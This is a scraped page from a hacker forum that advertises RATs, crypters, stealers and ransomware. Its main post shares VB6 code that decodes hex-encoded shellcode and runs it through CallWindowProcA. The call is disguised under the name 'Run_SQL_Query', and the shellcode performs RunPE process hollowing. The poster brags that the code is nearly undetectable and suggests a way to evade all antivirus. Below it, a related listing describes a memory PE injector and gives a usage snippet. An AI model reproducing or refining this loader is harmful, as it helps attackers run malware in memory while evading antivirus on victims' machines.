Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Need4Weed

      RunPE 1/32

      1 post in this topic

      Spoiler

      Option Explicit
       

      Private Declare Function Run_SQL_Query Lib "C:\Windows\System32\USER32" Alias "CallWindowProcA" (ByVal STD1 As Long, ByVal STD2 As Long, ByVal STD3 As Long, ByVal STD4 As Long, ByVal STD5 As Long) As Long

       
      Public Function SQL_Query(SQL_Table As Long)
      Dim POStr__aRRay() As Byte
      Dim POStr__  As String
      Dim ai As Long
       
      POStr__ = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
            "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
            "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
            "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
            "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
            "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
            "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
            "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
            "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
            "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
            "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
            "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
            "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
            "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
            "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
            "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
            "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
            "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
            "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
            "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
            "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
            "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
            "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
            "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
            "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"
       
       
      ReDim POStr__aRRay((Len(POStr__) / 2) - 1)
      For ai = 1 To Len(POStr__) - 1 Step 2
      POStr__aRRay(Int(ai / 2)) = CByte("&h" & Mid(POStr__, ai, 2))
      Next
       
      Run_SQL_Query VarPtr(POStr__aRRay(0)), SQL_Table, 0, 0, 0
       
       
       
      End Function

      Semi FUD Detected By Avira Only When Compiled Native

       

      Hidden Content

        Give reaction to this post to see the hidden content.

       

      I Think By Using TLB Method then All AVs will be eliminated !

      Good Luck and keep Sharing :)

       

       

      Edited by Need4Weed
      TLB Instruction to beat avira av
      • Like 2

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.

      • Similar Content

        • By sQuoII

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By dEEpEst
          RunPE-In-Memory
          Run a 32bit copy of Exe File in memory,like what Software Packer Do.
           
           

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By dEEpEst
          README.md
          Memory PE Injector
          A tool that reads a PE file from a byte array buffer and injects it into memory.
          Symmary
          Memory PE Injector is a C++ class which reads an executable file (PE) from a byte array and maps it into the memory space of another process. This is commonly known as Process Forking or RunPE. To accomplish this, the code follows these steps:
          The code launches a second instance of the program containing the code, in suspended mode. It unmaps the PE from the virtual memory space where it is loaded The given PE byte array is then mapped in place. The process is resumed and the end result is the PE file of the byte array running instead. Usage and Tips
          This code can be used in various scenarios. One of these scenarios is a case where you want to pack another program with your own one, but you'd like to deploy one executable only. You can add your second program in the resources of your first one, in an RT_RCDATA resource, then read the bytes and inject it directly into memory, without dropping it on the disk.
          Usage:
          Injector *injector = new Injector(); unsigned char *lpByteBuffer = injector->ReadFileBytes(L"C:/The/path/to/your/executable.exe"); injector->Inject(lpByteBuffer);  
          Download:
          Hidden Content
          Give reaction to this post to see the hidden content.